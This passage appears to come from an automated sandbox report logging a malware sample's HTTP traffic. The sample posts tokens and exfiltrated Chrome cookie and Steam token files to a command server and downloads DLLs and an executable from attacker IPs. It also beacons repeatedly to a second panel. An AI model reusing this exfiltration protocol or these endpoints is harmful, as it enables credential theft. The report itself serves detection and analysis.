name="token"d93af52dfdade3d16fbf3dddbf6dbdc6c6bd613db5c9bb96e14419d869df60b0b34ba3f7------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="message"plugins------IECBAFCAAKJDHJKFIEBG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 33 61 66 35 32 64 66 64 61 64 65 33 64 31 36 66 62 66 33 64 64 64 62 66 36 64 62 64 63 36 63 36 62 64 36 31 33 64 62 35 63 39 62 62 39 36 65 31 34 34 31 39 64 38 36 39 64 66 36 30 62 30 62 33 34 62 61 33 66 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="token"d93af52dfdade3d16fbf3dddbf6dbdc6c6bd613db5c9bb96e14419d869df60b0b34ba3f7------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="message"fplugins------KFHCAEGCBFHJDGCBFHDA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJECHost: 85.28.47.30Content-Length: 6191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHCBGCBFHIIDHIJKFBHost: 85.28.47.30Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 33 61 66 35 32 64 66 64 61 64 65 33 64 31 36 66 62 66 33 64 64 64 62 66 36 64 62 64 63 36 63 36 62 64 36 31 33 64 62 35 63 39 62 62 39 36 65 31 34 34 31 39 64 38 36 39 64 66 36 30 62 30 62 33 34 62 61 33 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------ECGHCBGCBFHIIDHIJKFBContent-Disposition: form-data; name="token"d93af52dfdade3d16fbf3dddbf6dbdc6c6bd613db5c9bb96e14419d869df60b0b34ba3f7------ECGHCBGCBFHIIDHIJKFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------ECGHCBGCBFHIIDHIJKFBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzY1NDEJMVBfSkFSCTIwMjMtMTAtMDUtMDcKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk1NzQwCU5JRAk1MTE9bk5hZHFXOXVUY1kwT1A2STNhZm5yNzFvNkV6YVlM
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHIHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 33 61 66 35 32 64 66 64 61 64 65 33 64 31 36 66 62 66 33 64 64 64 62 66 36 64 62 64 63 36 63 36 62 64 36 31 33 64 62 35 63 39 62 62 39 36 65 31 34 34 31 39 64 38 36 39 64 66 36 30 62 30 62 33 34 62 61 33 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 2d 2d 0d 0a Data Ascii: ------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="token"d93af52dfdade3d16fbf3dddbf6dbdc6c6bd613db5c9bb96e14419d869df60b0b34ba3f7------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="file"------ECBGCBGCAFIIECBFIDHI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 33 61 66 35 32 64 66 64 61 64 65 33 64 31 36 66 62 66 33 64 64 64 62 66 36 64 62 64 63 36 63 36 62 64 36 31 33 64 62 35 63 39 62 62 39 36 65 31 34 34 31 39 64 38 36 39 64 66 36 30 62 30 62 33 34 62 61 33 66 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 2d 2d 0d 0a Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="token"d93af52dfdade3d16fbf3dddbf6dbdc6c6bd613db5c9bb96e14419d869df60b0b34ba3f7------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="file"------JEHDHIEGIIIDHIDHDHJJ--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBFHost: 85.28.47.30Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFHHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 33 61 66 35 32 64 66 64 61 64 65 33 64 31 36 66 62 66 33 64 64 64 62 66 36 64 62 64 63 36 63 36 62 64 36 31 33 64 62 35 63 39 62 62 39 36 65 31 34 34 31 39 64 38 36 39 64 66 36 30 62 30 62 33 34 62 61 33 66 37 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 2d 2d 0d 0a Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"d93af52dfdade3d16fbf3dddbf6dbdc6c6bd613db5c9bb96e14419d869df60b0b34ba3f7------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="message"wallets------BKKKEGIDBGHIDGDHDBFH--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJHost: 85.28.47.30Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 33 61 66 35 32 64 66 64 61 64 65 33 64 31 36 66 62 66 33 64 64 64 62 66 36 64 62 64 63 36 63 36 62 64 36 31 33 64 62 35 63 39 62 62 39 36 65 31 34 34 31 39 64 38 36 39 64 66 36 30 62 30 62 33 34 62 61 33 66 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 2d 2d 0d 0a Data Ascii: ------HIJJDGDHDGDAKFIECFIJContent-Disposition: form-data; name="token"d93af52dfdade3d16fbf3dddbf6dbdc6c6bd613db5c9bb96e14419d869df60b0b34ba3f7------HIJJDGDHDGDAKFIECFIJContent-Disposition: form-data; name="message"files------HIJJDGDHDGDAKFIECFIJ--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBKHost: 85.28.47.30Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 33 61 66 35 32 64 66 64 61 64 65 33 64 31 36 66 62 66 33 64 64 64 62 66 36 64 62 64 63 36 63 36 62 64 36 31 33 64 62 35 63 39 62 62 39 36 65 31 34 34 31 39 64 38 36 39 64 66 36 30 62 30 62 33 34 62 61 33 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="token"d93af52dfdade3d16fbf3dddbf6dbdc6c6bd613db5c9bb96e14419d869df60b0b34ba3f7------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="file"------EGIDAFBAEBKKEBFIJEBK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAEBFHJJDAAKFIECGDBHost: 85.28.47.30Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 33 61 66 35 32 64 66 64 61 64 65 33 64 31 36 66 62 66 33 64 64 64 62 66 36 64 62 64 63 36 63 36 62 64 36 31 33 64 62 35 63 39 62 62 39 36 65 31 34 34 31 39 64 38 36 39 64 66 36 30 62 30 62 33 34 62 61 33 66 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 42 2d 2d 0d 0a Data Ascii: ------CAAEBFHJJDAAKFIECGDBContent-Disposition: form-data; name="token"d93af52dfdade3d16fbf3dddbf6dbdc6c6bd613db5c9bb96e14419d869df60b0b34ba3f7------CAAEBFHJJDAAKFIECGDBContent-Disposition: form-data; name="message"jbdtaijovg------CAAEBFHJJDAAKFIECGDB--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
